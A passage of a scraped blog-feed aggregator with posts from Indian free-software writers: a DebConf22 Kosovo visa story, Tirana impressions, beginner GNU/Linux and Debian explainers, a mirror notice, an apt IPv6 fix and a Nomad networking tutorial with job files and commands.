However, this was not the standard way to get a Kosovo visa; it was an exception made by the Ministry of Foreign Affairs of Kosovo for us.\nThe conference was to begin on the 10th of July. So, I booked my flight tickets from Delhi to Tirana for the 6th and bus tickets from Tirana to Prizren for the 10th of July. Further, I transferred the visa fee of 40 Euros into the embassy’s bank account using wise.com. On the 9th of June, I emailed my documents to the Kosovo embassy in Tirana for my visa application. Here is the list of documents I sent:\nFilled and signed Visa Application form\nScanned copy of my passport\n1 photo of myself\nInvite letter and proof of travel, food and accommodation bursary\nConfirmed return flight ticket from Delhi to Tirana\nBus tickets from Tirana to Prizren\nBank statement (last 3 months)\nHealth insurance valid throughout the territory of the Republic of Kosovo\nReceipt of payment of 40 Euros for the visa fee\nI did not receive any acknowledgement of the receipt of my email from the embassy. On the 22nd of June (13 days after submitting the application), I wrote a follow-up email to the embassy asking for my visa application status. The embassy responded by saying:\nYour name is not in the list of approved names to apply remotely. Therefore your case cannot be processed.\nA couple of other Indian attendees reported getting the same response from the embassy. However, Utkarsh from the bursary team confirmed that our names were on the list. On the 27th of June, with 9 days to go before our flight to Albania, Praveen (a Debian Developer) sent an email to the Debian Project Leader Jonathan Carter, CCing all the prominent DebConf team members and Indian attendees, sharing our frustration with the process. He proposed that Debian reimburse the tickets if we didn’t get a response from the embassy.\nOn the other hand, Arianit Dobroshi from the organizing team was fairly confident about the approval and suggested we not panic. In the same email, Praveen also proposed that Debian include the visa fee in the bursary by default for sponsored attendees, for which Jonathan shared his views in a public mailing list here.\nAs the travel date approached, I was panicking. I asked my travel agent to check on the cancellation fee for my flight. They told me it was around 15,000 INR. However, repeated assurances from Arianit made me stick to my plans. On July 3rd, he sent us a letter from Kosovo’s Ministry of Foreign Affairs stating that our visas were being processed in Tirana.\nI wasn’t confident that the document was sufficient for boarding the flight. If I went to the airline staff at Delhi Airport and told them I was attending a conference in Kosovo, they would want to see whether I had a valid visa. Otherwise, they would refuse me boarding.\nTherefore, I told the airline I was going to Albania. To my surprise, the airline did not ask me for a Kosovo visa upon seeing my conference invitation letter. Maybe they didn’t know about Kosovo, as India doesn’t recognize it?\nAfter grilling me for some time, the airline gave me my boarding pass. The next stop was immigration. The immigration officer only asked me where I was going, to which I replied, “Albania,” and they asked me to show a visa. I told them that Albania was visa-free. So, they only checked whether Indians required a visa to visit Albania. I was elated after clearing immigration. This was followed by boarding the flight.\nI had a connecting flight from Dubai.
Here, I met other DebConf attendees coming from Kochi and Mumbai. Before boarding the flight, we were asked once again about our purpose for visiting Albania, to which we showed our invitation letters. Again, they didn’t notice that the conference was in Kosovo.\nOn the 7th of July, while we were in Tirana, we received the following email from one of the conference organizers, Arianit:\nFor Tirana applicants,\nWe got notification that visas have arrived in Tirana. Please show up at\nthe Consulate tomorrow at 08:00 to get them stamped. They work until 13:30\ntomorrow. We are trying to find a solution for people arriving in Tirana at\n14:00 apparently.\nRegards,\nArianit\nThe next day, on the 8th of July, we went to the Kosovo embassy early in the morning and got our visas. On the 10th, we had a scenic morning bus trip from Tirana to Prizren.\nThe Innovation & Training Park (ITP) in Prizren, Kosovo was the venue of DebConf 22.\n\nI am at ITP Prizren—the venue of DebConf22—writing this post. It feels like a miracle to be here in Prizren attending DebConf. Looking forward to working on some projects and meeting nice people.\nLastly, I would like to thank the organizing team and the country of Kosovo.",[],{"slug":1566,"title":1567,"link":1568,"pubDate":1569,"contentSnippet":1570,"tags":1571,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"first-impressions-of-albania","First Impressions of Albania","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffirst-impressions-of-albania\u002F","Wed, 06 Jul 2022 00:00:00 +0000","I landed in Tirana, Albania today, a country in the Balkans region of Europe.\nMy first impressions are:\nTirana is a neat and clean city with beautiful landscapes surrounding it.\nBeautiful views at the Tirana airport just after landing.\n\n\n\nTirana International Airport.\n\n\n\nTaxis outside Tirana International Airport.\n\n\n\nBeautiful views on the way from Tirana airport to the city center.\n\n\n\nLocals are very patient and hospitable.\nStreets are not very crowded and footpaths are wide.\nWide footpaths in Tirana.\n\n\n\nTree-lined sidewalks in Tirana.\n\n\n\nA bus stop in Tirana.\n\n\nThe city has bars and cafes all around the place.\nA bus stop in Tirana.\n\n\n\nIt is a well-planned city.\nIt is cheaper than most places in Europe.\nMy first impression is that this is a very beautiful and hospitable place, although people who don’t eat meat can have some difficulty finding good vegetarian food.\nI hope to have fun on this Albania trip.",[],{"slug":1573,"title":1574,"link":1575,"pubDate":1576,"contentSnippet":1577,"tags":1578,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"is-gnu-linux-hard-for-beginners","Is GNU\u002FLinux hard to use for beginners?","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fis-gnu-linux-hard-for-beginners\u002F","Tue, 28 Jun 2022 17:47:49 +0530","GNU\u002FLinux operating systems (if you have heard about Linux operating systems, I am talking about the same thing. Read Why GNU\u002FLinux if you are curious about the details.) have a reputation for being hard to use for non-techies. Some popular examples of GNU\u002FLinux distributions are Ubuntu, Debian and Fedora. I repeatedly hear that they are hard to install, or that knowledge of the command line is necessary to use them and therefore only advanced users use GNU\u002FLinux. This is not true.
Depending on your requirements, you can choose a distro which does not require a lot of technical skill to use.\nFirst of all, I would like to point out why I advertise GNU\u002FLinux operating systems. I promote the idea of Free Software, and when I suggest that people use freedom-respecting software, the obvious choice for a desktop operating system is a GNU\u002FLinux operating system. There are many non-GNU Linux-based operating systems as well, and I am fine with people using them, but since I have never used them, I suggest what I have used.\nWhat I think is that GNU\u002FLinux is for everybody. There is so much choice here that it is practically never-ending. Whether you are a normal user who just wants a stable operating system or someone who likes to hack around and break things while learning something new, GNU\u002FLinux is for you. Proprietary operating systems are full of malware, so it is a good time to switch to a GNU\u002FLinux distro. These are usually built by a community, everything is public and open for all to see, they respect users’ freedom and privacy, and they are usually far more secure than proprietary software by design.\nWhether it is school labs, a company’s production machine, personal computers, servers, Raspberry Pis, human rights defenders or journalists, GNU\u002FLinux is for everybody. The choice of GNU\u002FLinux distro depends on your use case and threat model. It is not like Windows, where everyone uses the same thing with the same appearance. Different people choose different distributions with very different appearances and customization, depending on their taste.\nHow to choose a GNU\u002FLinux distribution for yourself\nThere are so many GNU\u002FLinux distros to choose from that it can be overwhelming to research all the choices. The Librehunt website can ease your search by asking a few questions about what type of distro you want and then suggesting a few distros matching your criteria. Popular GNU\u002FLinux distributions like Ubuntu, Debian and Fedora have a lot of user support from the community. If you use Ubuntu, for example, and you are stuck with some technical problem, chances are it is already answered on their Askubuntu forum. If not, then you can ask your question there. Many Free Software communities provide technical support. GNU\u002FLinux distros usually have large communities behind them that collaborate on the operating system of their choice. Here are a few suggestions of mine for a user-friendly distro to start with: Debian, Ubuntu, Zorin OS, GNU\u002FLinux Mint, Fedora. I haven’t tried all of them, but I have heard good feedback about Zorin OS, Linux Mint and Fedora.\nAfter you have selected a distro, the next step is to choose a Desktop Environment. These differ in their appearance and philosophy. For example, if you are planning to run GNU\u002FLinux on old hardware, then XFCE is a suitable Desktop Environment: it is lightweight and does not consume a lot of resources. GNOME and KDE Plasma are very popular Desktop Environments with large communities behind them.\n\nDebian 11 with GNOME desktop. Source: Wikimedia Commons.\n\n\n\nKDE Plasma desktop. Source: Wikimedia Commons.\n\nInstallation\nThe installation of a distro depends on your hardware and the distro you choose. The distro you are installing might have an installation guide on its website. For many distros, the installation is much the same.
Arch Linux is for somewhat advanced users, and its installation differs from, say, Ubuntu’s.\nYou will find tons of blogs and video tutorials for installing the distro of your choice.\nMany laptops ship with GNU\u002FLinux preinstalled. Some examples are: the Indian vendor Mostly Harmless, Purism devices, the Ministry of Freedom project in the UK, Lenovo selling laptops with Ubuntu or Fedora pre-installed, Clevo selling laptops with Debian pre-installed, Manjaro, which has partnered with some hardware manufacturers to ship it out of the box, System76 laptops, etc.\nI suggest you do some research and choose a computer with GNU\u002FLinux preinstalled next time.\nLearning about the GNU\u002FLinux operating system\nMany blogs and YouTube channels exist where you can learn about the distros. If you are curious to learn the command line, you will find tons of resources on the internet, and there are many books written on the command line to choose from. Whatever distro you are using, the Arch Wiki can be a handy guide.\nI started with Debian as a beginner, and I learnt some command line just for fun and curiosity, but it is not mandatory for a Debian user. I found the operating system easy and intuitive to use. I have used Manjaro for a couple of months and PureOS for around half a year. Whenever I am stuck, I usually get help from the internet.\nConclusion\nAll in all, GNU\u002FLinux distros are highly customizable and give users the choice and freedom to use what they want. There are user-friendly distros like Ubuntu and Debian with good user support and large communities behind them, so you can always ask for help. I hope this post will strike down any fears or doubts you might have about starting to use GNU\u002FLinux.",[],{"slug":1580,"title":1581,"link":1582,"pubDate":1583,"contentSnippet":1584,"tags":1585,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"what-is-debian","What is Debian","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fwhat-is-debian\u002F","Sun, 26 Jun 2022 13:55:52 +0530","Debian as an operating system\nDebian desktop.\n\nCredits: Juliette Taka. License: CC-BY-SA-4.0. Source: Debian wiki.\n\nDebian GNU\u002FLinux is a Free Software operating system (software which respects users’ freedom to run, study, modify, share, and share modified versions). Debian is committed to the Free Software philosophy, as software freedom is deeply embedded in its social contract. Debian’s official image ships with only free software, including firmware, and the official repositories also contain only Free Software. If users need nonfree drivers, then separate images with nonfree firmware are also available on the Debian website.\nDebian's tagline is 'The Universal operating system.'\n\nCredits: Juliette Taka. License: CC-BY-SA-4.0. Source: Debian wiki.\n\nThe Debian operating system has three branches: stable, testing and unstable. Debian explains that the main goal of the project is to develop the stable branch. Other branches are only a means to that end. Of course, many users might still find it suitable to install testing or unstable, keeping in mind that these might break.\nDebian is known for its stability and its universality. The stability of the Debian stable branch comes from the fact that it is extensively tested as the testing branch before release. The three-branch system allows the user to choose the desired stability. The stable branch gets only security updates and mission-critical bug fixes.
So, the packages in the stable branch might not be the latest versions, but they are tested thoroughly before being put there. Debian Stable users can download recent releases of some software from the Debian backports repository. The stable branch is the recommended one for a company’s production machines or school labs, and for personal computers too.\nDebian can run on all types of hardware; it supports 9 CPU architectures officially and some others unofficially. It can run on your personal computer, a school computer, old hardware, servers, Raspberry Pi and similar devices, IoT devices, etc. Whatever piece of hardware you have, you can put Debian on it, and that is why Debian’s tagline is ‘The Universal Operating System’. This is far more than is available for any other GNU\u002FLinux distribution.\nMany popular GNU\u002FLinux distributions are based on Debian. Examples are Ubuntu, PureOS, Tails OS etc.\nPeople behind Debian\nDebian’s biggest feature is the community behind it and how that community makes decisions. The guiding principles of the Debian community are the Debian Social Contract and the Debian Free Software Guidelines.\nDebConf19 group photo.\n\nSource:  Debian Pics.\n\nLicense:MIT License (Expat). Debian license page.\n\n\nIn short, the Debian Social Contract promises the following to its users: 1) 100% Free Software; 2) the Debian project will give back to the Free Software community; 3) problems won’t be hidden; 4) users are the priority; 5) support for nonfree packages will be provided to users, if required.\nThe project’s 29-year track record says that these promises have never been broken. It is an independent project made by volunteers all around the globe. It has a democratic decision-making structure, as directed by its constitution.\nCompanies or individuals sponsoring the Debian project do not get any say in its decisions just because they gave money to the project.\nThe Debian project’s democratic decision-making, along with the software freedom of the operating system, makes it one of the most secure operating systems, since Debian does not have a single point of failure.\nThis works as follows:\nEvery Debian Developer’s gpg keys are signed by at least two other existing Debian Developers. It is a decentralized trust model and forms a web of trust. Every package uploaded to Debian is compiled from its source code and signed by the private gpg keys of a Debian Developer. Only the owner of the keys has access to the private keys. A maintainer of a Debian package abusing their position to intentionally upload malicious code will harm their own reputation in society, as every upload is public and will stay there for a lifetime. Compare this to a centralized corporation, which can put malicious code into packages without the change ever being public.\nHow can we make sure that the binaries match the source code? Debian is also working on reproducible builds, so that users can build the package on their own and verify that the binary actually matches the source code. Purism explained the concept very well in their blog post.\nDebian has a separate LTS team which provides support for Debian stable releases for at least 5 years. This can be helpful for companies and organizations who want support in their Debian usage.\nIn conclusion, Debian is a freedom-respecting operating system maintained and developed by its users around the globe.
It is not controlled by a single entity, and this makes it hard to compromise, making it one of the most secure operating systems on earth.\nMy experience\nI started using Debian in August 2021 and have tried all the branches of Debian: stable, testing and unstable. I was not using only Debian in this time frame; I switched to PureOS for around 6 months. Personally, I faced no problems using Debian. I found that even the testing branch is stable enough to be my daily driver. Currently, I am running the stable branch of Debian Bullseye, with backports added to my sources file. The Desktop Environment that has suited me the most so far is KDE Plasma. I love it, and whenever I switch to any other Desktop Environment, I do not feel at home.\nDebian with KDE Plasma desktop. Released under CC-BY-SA-4.0\n\nRead further\nWant to install Debian on your computer? Or curious about how to contribute to Debian? Please check:\nGet Debian for your device.\nContribute to Debian.\nAn Indian shop sells hardware that can run a fully free version of Debian.\nBuy a computer with Debian pre-installed.\nClevo is shipping laptops with Debian out-of-the-box.\nLibrem hardware (like laptops and mobile phones) can run Debian.\nIf you have any technical questions, please feel free to ask in any of the Debian user support channels or the Free Software Community of India.",[],{"slug":1587,"title":1588,"link":1589,"pubDate":1590,"contentSnippet":1591,"tags":1592,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"albony-mirror","Albony.xyz Mirror","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Falbony-mirror\u002F","Fri, 24 Jun 2022 16:35:04 +0000","mirror.albony.xyz Currently mirroring 11 repositories (archlinux, endeavouros, linuxmint, artixlinux, cachylinux, fdroid, manjaro, armbian, termux, blackarch and chaotic-aur).\nThis mirror has 1Gbit\u002Fs bandwidth and is hosted in Nagpur, India. I get more than 14TB in traffic and more than 14 million requests per month, and around 2TB every week, sometimes even more. You can support me by donating at: https:\u002F\u002Fmirror.albony.xyz\u002Fdonate.html via BTC or buymecoffee",[],{"slug":1594,"title":1595,"link":1596,"pubDate":1597,"contentSnippet":1598,"tags":1599,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"apt-ipv6","APT mirror connection issue: IPv6","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fapt-ipv6\u002F","Mon, 16 May 2022 15:12:24 +0530","The Problem: when I did sudo apt update && sudo apt upgrade -y, I noticed that it was trying to connect to the Ubuntu mirror over IPv6 (and failing). My ISP hasn’t enabled IPv6 for me, so I can’t connect over IPv6, and I don’t have any IPv6 DNS servers. But apt was still trying to connect over IPv6… weird… The Fix: you can create a file in the \u002Fetc\u002Fapt\u002Fapt.conf.d directory to force apt to use IPv4: echo 'Acquire::ForceIPv4 \"true\";' | sudo tee \u002Fetc\u002Fapt\u002Fapt.",[],{"slug":1601,"title":1602,"link":1603,"pubDate":1604,"contentSnippet":1605,"tags":1606,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"nomad-networking-explained","Understanding Networking in Nomad","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fnomad-networking-explained\u002F","2022-05-13T18:40:55.000Z","Nomad is a general-purpose cluster orchestrator and scheduler. Up until Nomad 1.3 was released, it had no native support for discovering other applications running in the cluster.
This is sort of a very elementary requirement when scheduling tasks in a cluster. Nomad relies on Consul to discover other “services” and has first class support for registering and fetching service records, which makes things easier. Consul provides the records via various mechanisms such as a REST API, DNS and Consul Templates, which render the exact IP\u002FPort of the service in a Go template that can be injected into your application.\nI’ve been using Nomad for quite some time (both at work and for my self-hosted instance), however I’ve often tripped up when it comes to networking. Nomad has a lot of simple concepts and it all “clicks” once you understand and recognise the various patterns that can be used to connect the applications. A major hurdle for someone new to Nomad who is trying to integrate Consul is that they first have to understand how Consul works and deploy a Consul cluster, which creates a lot of friction for newcomers to Nomad. Nomad 1.3 solves a part of this issue (i.e. no need to run Consul for basic service discovery) and is a great fit for just getting started with Nomad-based networking. However, in this post I’d like to go through all the different networking patterns I’ve known or used in production and make an attempt at simplifying these concepts for Nomad beginners.\n\nScenario 1: Expose an application on the host#\n\nWe’ll start off with the simplest use case: you have a Redis container and you want to expose that to the host. The docker run equivalent of what we wanna do is:\ndocker run --rm -p=6379 redis:7\nThis command exposes a dynamic port on your host. To see what the port number actually is, you can run docker ps and look for output similar to 0.0.0.0:49153->6379\u002Ftcp under PORTS.\nTo verify, I can use redis-cli to connect to this host:\n$ redis-cli -p 49153                \n127.0.0.1:49153> ping\nPONG\nFantastic! Now, let’s stop this container and see how we can do the same in Nomad.\njob \"redis\" {\n  datacenters = [\"dc1\"]\n  type        = \"service\"\n\n  group \"redis\" {\n    count = 1\n\n    network {\n      mode = \"host\"\n      port \"redis\" {\n        to = 6379\n      }\n    }\n\n    task \"redis\" {\n      driver = \"docker\"\n\n      config {\n        image = \"redis:7\"\n        ports = [\"redis\"]\n      }\n\n      resources {\n        cores  = 1\n        memory = 256\n      }\n    }\n  }\n}\nThis is a barebones definition of how to run Redis on Nomad. We’re not dealing with any volume mounts, custom config etc here - the idea is to only learn networking concepts in Nomad!\nSave the above file as job.nomad and deploy to the cluster with:\nnomad run job.nomad\nWithin a few lines of config, we have a Docker container running, which exposes the dynamic port 23522.\n\nWe can connect to it via redis-cli on our host:\n$ redis-cli -p 23522\n127.0.0.1:23522> ping\nPONG\nNOTE: It’s important to have ports in your task.config section. Nomad passes this information to the docker daemon running on the host. 
So unless you specify which ports to advertise in the container, it won’t know whether to expose 6379 or not.\nThis can be easily verified with docker inspect:\n# without `ports`\n$ docker inspect fc32a4ffd148 -f \"{{json .NetworkSettings.Ports }}\" | jq '.'\n{\n  \"6379\u002Ftcp\": null\n}\n\n# with `ports`\n$ docker inspect 0421101d0228 -f \"{{json .NetworkSettings.Ports }}\" | jq '.'\n{\n  \"6379\u002Ftcp\": [\n    {\n      \"HostIp\": \"127.0.0.1\",\n      \"HostPort\": \"31930\"\n    }\n  ],\n  \"6379\u002Fudp\": [\n    {\n      \"HostIp\": \"127.0.0.1\",\n      \"HostPort\": \"31930\"\n    }\n  ]\n}\nExposing Static ports#\nA less common scenario is to bind an application to a static port on the host. We’ll cover an example of when you want to do that a bit later, but this is generally not widely used because in a cluster your application can “float” around, and the idea of sticking to one port is not very useful. However, there’s a way for us to do that by simply adding a static line in our port block:\n    network {\n      port \"redis\" {\n        to     = 6379\n        static = 6379\n      }\n    }\n\nWhen we deploy the same file again, we can see the port allocation has changed from dynamic to the static port we assigned. It’s your job to ensure that no other application is listening on the same interface and port, because that’s bound to cause conflicts.\nScenario 2: Communicate with Redis within the same group#\nFor this scenario, we are going to assume there’s a Go application that needs to talk to Redis. However, in this scenario Redis is sort of an ephemeral cache, so it’s okay to deploy both of them in the same Task Group.\n\nA Group can contain multiple tasks. What's important to know here is that a group will always have its own shared network namespace. This means that if you have 2 tasks in the group, they both will have access to the same network namespace. This allows both tasks to talk to each other on the same network interface.\n\njob \"hello\" {\n  datacenters = [\"dc1\"]\n  type        = \"service\"\n\n  group \"app\" {\n    count = 1\n\n    network {\n      mode = \"host\"\n      port \"app\" {\n        to     = 8080\n        static = 8080\n      }\n      port \"redis\" {\n        to     = 6379\n        static = 6379\n      }\n    }\n\n    task \"redis\" {\n      driver = \"docker\"\n\n      config {\n        network_mode = \"host\"\n        image        = \"redis:7\"\n        ports        = [\"redis\"]\n      }\n\n      resources {\n        cores  = 1\n        memory = 256\n      }\n    }\n\n\n    task \"app\" {\n      driver = \"docker\"\n      env {\n        DEMO_REDIS_ADDR = \"${NOMAD_ADDR_redis}\"\n      }\n\n      config {\n        network_mode = \"host\"\n        image        = \"mrkaran\u002Fhello-app:1.0.0\"\n        ports        = [\"app\"]\n      }\n\n      resources {\n        cores  = 1\n        memory = 512\n      }\n    }\n  }\n}\nKey Points:\nYou can see we have defined task app and task redis under the same group, app. This means that Nomad will co-locate both of these tasks on the same client (because they share not just the same network namespace but a common allocation directory as well - which makes it super easy to share files across tasks).\nWe are using NOMAD_ADDR_redis to get the IP:Port combination for the redis task. This gets injected at runtime by Nomad. 
You can find a list of runtime variables here.\nThis is ideal for quick tests or dev setups where you don’t want the overhead of service discovery and want to connect your applications with the least friction possible.\nThe above config is suitable if you’re migrating from docker-compose based environments; you can use this template for your services. The biggest limitation of this approach is that it’s using a host network, so it’s not possible to set up any kind of access controls on it. This effectively means that nothing prevents other applications on the cluster from talking to these ports.\nScenario 3: Communicate across different groups#\nTask Groups are useful if you have related tasks (like an init task that fetches files before the main task starts). But a drawback of using a group is that you can’t scale the tasks independently. In the above example, we placed Redis and App in the same group, but that means that if you increase the group’s count to scale the app, you end up scaling the Redis containers too. This is undesirable, as Redis may not need to scale proportionally to the app.\nThe fix is to split the tasks into their own individual groups:\njob \"hello\" {\n  datacenters = [\"dc1\"]\n  type        = \"service\"\n\n  group \"app\" {\n    count = 1\n\n    network {\n      mode = \"host\"\n      port \"app\" {\n        to     = 8080\n        static = 8080\n      }\n    }\n\n    task \"app\" {\n      driver = \"docker\"\n      env {\n        DEMO_REDIS_ADDR = \"localhost:6379\"\n      }\n\n      config {\n        image = \"mrkaran\u002Fhello-app:1.0.0\"\n        ports = [\"app\"]\n      }\n\n      resources {\n        cores  = 1\n        memory = 512\n      }\n    }\n  }\n\n  group \"redis\" {\n    count = 1\n\n    network {\n      mode = \"host\"\n      port \"redis\" {\n        to     = 6379\n        static = 6379\n      }\n    }\n\n    task \"redis\" {\n      driver = \"docker\"\n\n      config {\n        image = \"redis:7\"\n        ports = [\"redis\"]\n      }\n\n      resources {\n        cores  = 1\n        memory = 256\n      }\n    }\n  }\n}\nWhen you submit this job, you get 2 allocation IDs (each group creates one alloc). The key point here is that both of these groups have their own network namespace. So, we don’t really have any way to reach the other application (we can’t really rely on the host network, because there’s no guarantee that both of these groups will be deployed on the same node).\nIn the previous example, we saw how Nomad exposes runtime variables containing information about the other tasks in the same group. But now that the groups are separate, the app container has no idea about redis (or vice versa):\nenv | grep NOMAD\nNOMAD_REGION=global\nNOMAD_CPU_LIMIT=4700\nNOMAD_IP_app=127.0.0.1\nNOMAD_JOB_ID=hello\nNOMAD_TASK_NAME=app\nNOMAD_SECRETS_DIR=\u002Fsecrets\nNOMAD_CPU_CORES=1\nNOMAD_NAMESPACE=default\nNOMAD_ALLOC_INDEX=0\nNOMAD_ALLOC_DIR=\u002Falloc\nNOMAD_JOB_NAME=hello\nNOMAD_HOST_IP_app=127.0.0.1\nNOMAD_SHORT_ALLOC_ID=a9da72dc\nNOMAD_DC=dc1\nNOMAD_ALLOC_NAME=hello.app[0]\nNOMAD_PORT_app=8080\nNOMAD_GROUP_NAME=app\nNOMAD_PARENT_CGROUP=nomad.slice\nNOMAD_TASK_DIR=\u002Flocal\nNOMAD_HOST_PORT_app=8080\nNOMAD_MEMORY_LIMIT=512\nNOMAD_ADDR_app=127.0.0.1:8080\nNOMAD_ALLOC_PORT_app=8080\nNOMAD_ALLOC_ID=a9da72dc-94fc-6315-bb37-63cbeef153b9\nNOMAD_HOST_ADDR_app=127.0.0.1:8080\nService Discovery#\nThis is where things get interesting. The app group needs to discover redis before connecting to it. 
There are multiple ways to do that, but we’ll cover the 2 most common ones.\nUsing Nomad native service discovery#\n\nThis is a feature launched in Nomad 1.3. Up until this release, Nomad had to rely on Consul for this. But with native service discovery built into Nomad, things are much simpler. Let’s make the following changes to our job file. In each group, we’ll add a service definition:\n  group \"app\" {\n    count = 1\n\n    network {\n      mode = \"host\"\n      port \"app\" {\n        to = 8080\n      }\n    }\n\n    service {\n      name     = \"app\"\n      provider = \"nomad\"\n      port     = \"app\"\n    }\n    \u002F\u002F task is the same\n  }\n\n  group \"redis\" {\n    count = 1\n\n    network {\n      mode = \"host\"\n      port \"redis\" {\n        to = 6379\n      }\n    }\n\n    service {\n      name     = \"redis\"\n      provider = \"nomad\"\n      port     = \"redis\"\n    }\n    \u002F\u002F task is the same\n  }\nSo, we added a new service block and got rid of the static ports. Well, there’s no need to bind to static ports when we’re using service discovery.\nAfter submitting the job, we can use the nomad service list command to ensure the services are registered with Nomad.\nnomad service list\nService Name  Tags\napp           []\nredis         []\nTo find out details about a particular service, we can use nomad service info:\n$ nomad service info app      \nJob ID  Address          Tags  Node ID   Alloc ID\nhello   127.0.0.1:29948  []    d92224a5  5f2ac51f\n$ nomad service info redis\nJob ID  Address          Tags  Node ID   Alloc ID\nhello   127.0.0.1:22300  []    d92224a5  8078c9a6\nPerfect! We can see the dynamic port assignment in each of the services. To use this config in our app, we will template it:\n    task \"app\" {\n      driver = \"docker\"\n\n      template {\n        data = \u003C\u003CEOH\n{{ range nomadService \"redis\" }}\nDEMO_REDIS_ADDR={{ .Address }}:{{ .Port }}\n{{ end }}\nEOH\n\n        destination = \"secrets\u002Fconfig.env\"\n        env         = true\n      }\n\n      config {\n        image = \"mrkaran\u002Fhello-app:1.0.0\"\n        ports = [\"app\"]\n      }\n\n      resources {\n        cores  = 1\n        memory = 512\n      }\n    }\nWe added the template stanza, which will interpolate the env variables in the container. We loop over nomadService and get the address and port of the redis service. This makes it convenient for tasks on other nodes to discover each other.\nUsing Consul Service Discovery#\n\nJust by tweaking provider in our service block, we can use the Consul agent for service discovery.\n    service {\n      name     = \"app\"\n      provider = \"consul\"\n      port     = \"app\"\n    }\n\n\n    task \"app\" {\n      driver = \"docker\"\n\n      template {\n        data = \u003C\u003CEOH\n{{ range service \"redis\" }}\nDEMO_REDIS_ADDR={{ .Address }}:{{ .Port }}\n{{ end }}\nEOH\n\nEnsure that you're running Consul and have connected Nomad to it. Please refer to the docs for the same.\n\nSince we are now using Consul for registering services, we have to loop over service instead of nomadService. The rest of the things remain pretty much the same. 
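As an aside (a hedged sketch, assuming a local Consul agent on its default HTTP port 8500): once the provider is consul, the registration can also be inspected from outside Nomad, straight from Consul’s catalog API:\n$ curl -s http:\u002F\u002F127.0.0.1:8500\u002Fv1\u002Fcatalog\u002Fservice\u002Fredis | jq '.[0].ServiceAddress, .[0].ServicePort'\nThe exact values depend on your cluster, but this should echo the same address\u002Fport pair that the template above interpolates. 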
I really like how with just 2 lines of code you can switch between Nomad\u002FConsul for discovering services.\nNow, of course, there are certain advantages to using Consul:\nYou can query the address of the service with DNS:\ndoggo redis.service.consul @tcp:\u002F\u002F127.0.0.1:8600\nNAME                    TYPE    CLASS   TTL ADDRESS     NAMESERVER     \nredis.service.consul.   A       IN      0s  172.20.10.3 127.0.0.1:8600  \nDefine health checks. Since native service discovery is a new feature, health checks on Nomad services aren’t there yet, but there’s a GitHub issue open for the same.\nUpdate (2024): Native health checks are now available in Nomad since version 1.4 (released October 2022). This means you can define health checks directly in your Nomad service definitions without requiring Consul. You can read more about this in the Nomad documentation.\nAccessible by applications outside Nomad. If Consul is used by applications outside the Nomad cluster, they can still resolve service addresses (using DNS or the REST APIs).\nHowever, Nomad native service discovery is perfect for local setups and even smaller use-cases in production, because it eliminates the need to run Consul in your stack, which is a big thing!\nScenario 4: Restricting access to certain namespaces#\n\nIn all the above scenarios, we found that the service gets exposed to the local Nomad client. If you’re running multiple namespaces on your cluster, you may not want to expose services across them at all. In addition, you may want fine-grained control over which application can access a particular service. All of this is possible via a service mesh. Nomad provides a way to have a “service mesh” via Consul Connect. Consul Connect can do mTLS and service authorization. Under the hood, it’s an Envoy proxy that runs alongside your app (“sidecar” is the fancy way to say that). The Consul agent generates the Envoy configuration for you, so it’s all pretty seamless.\nFor this to work, the first thing we need is a bridge network mode. This network mode is actually a CNI plugin and needs to be installed separately in \u002Fopt\u002Fcni\u002Fbin. Follow the steps mentioned here.\n    network {\n      mode = \"bridge\"\n      port \"redis\" {\n        to = 6379\n      }\n    }\nThe service in redis is called a Consul Connect Ingress:\n    service {\n      name     = \"redis\"\n      provider = \"consul\"\n      port     = \"6379\"\n      connect {\n        sidecar_service {}\n      }\n    }\nIt’s an empty block because we don’t need to define any upstream here. The rest of the values take their defaults.\nNext, we create a service for our app, and that is a Consul Connect Egress:\n    service {\n      name     = \"app\"\n      provider = \"consul\"\n      port     = \"app\"\n      connect {\n        sidecar_service {\n          proxy {\n            upstreams {\n              destination_name = \"redis\"\n              local_bind_port  = 6379\n            }\n          }\n        }\n      }\n    }\nHere we define an upstream for redis. If you look closely, we are using a literal port number in the Consul Connect Ingress; for some reason, if you use a named port instead of 6379, it doesn’t work. I am not entirely sure whether that’s a bug or intended behaviour.\nSo here, when the app wants to talk to redis, it talks to localhost:6379, which is the local port the Envoy sidecar is listening on. 
We can verify that using netstat:\n$ netstat -tulpvn\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\u002FProgram name    \ntcp        0      0 127.0.0.2:19001         0.0.0.0:*               LISTEN      -                   \ntcp        0      0 0.0.0.0:23237           0.0.0.0:*               LISTEN      -                   \ntcp        0      0 127.0.0.1:6379          0.0.0.0:*               LISTEN      -                   \ntcp6       0      0 :::8080                 :::*                    LISTEN      1\u002F.\u002Fhello.bin\nThe traffic is sent from this port to the other Envoy proxy, on a port that it advertises (and which Consul automagically configured). That Envoy proxy then sends the traffic to the redis container on port 6379. The proxied traffic is securely encrypted via mTLS and authorized (via Consul Intentions - not covered in this post).\nScenario 5: Exposing services to end-user#\n\nIn the first scenario, we discussed using static ports. Well, it turns out they’re super helpful if you want to define a traffic ingress service. Unlike K8s, Nomad doesn’t have any Ingress Controllers, so the best way is to deploy these web proxies on each node as a system job (which ensures it runs on every client node) and bind them to a static port (say 443\u002F80). Then configure your load balancers, registering all the Nomad nodes as target IPs with the static port you defined. These ingress proxies (like HAProxy\u002FNginx) can then be used to talk to your application via any of the patterns we’ve mentioned above.\nTypically, you’d want to use a “host-based” routing pattern for your ingress proxy to make a routing decision.\nFor example, say you have an a.example.org DNS record pointing to an ALB. When a request comes to the ALB, it forwards it to one of the NGINX\u002FHAProxy instances. For HAProxy to correctly route the traffic to the right service, you can use the “Host” header.\nSummary#\nThese were some of the common networking patterns that I’m aware of. Since some of these concepts are not really straightforward, I hope the explanation helped in bringing some clarity.\nThere’s much 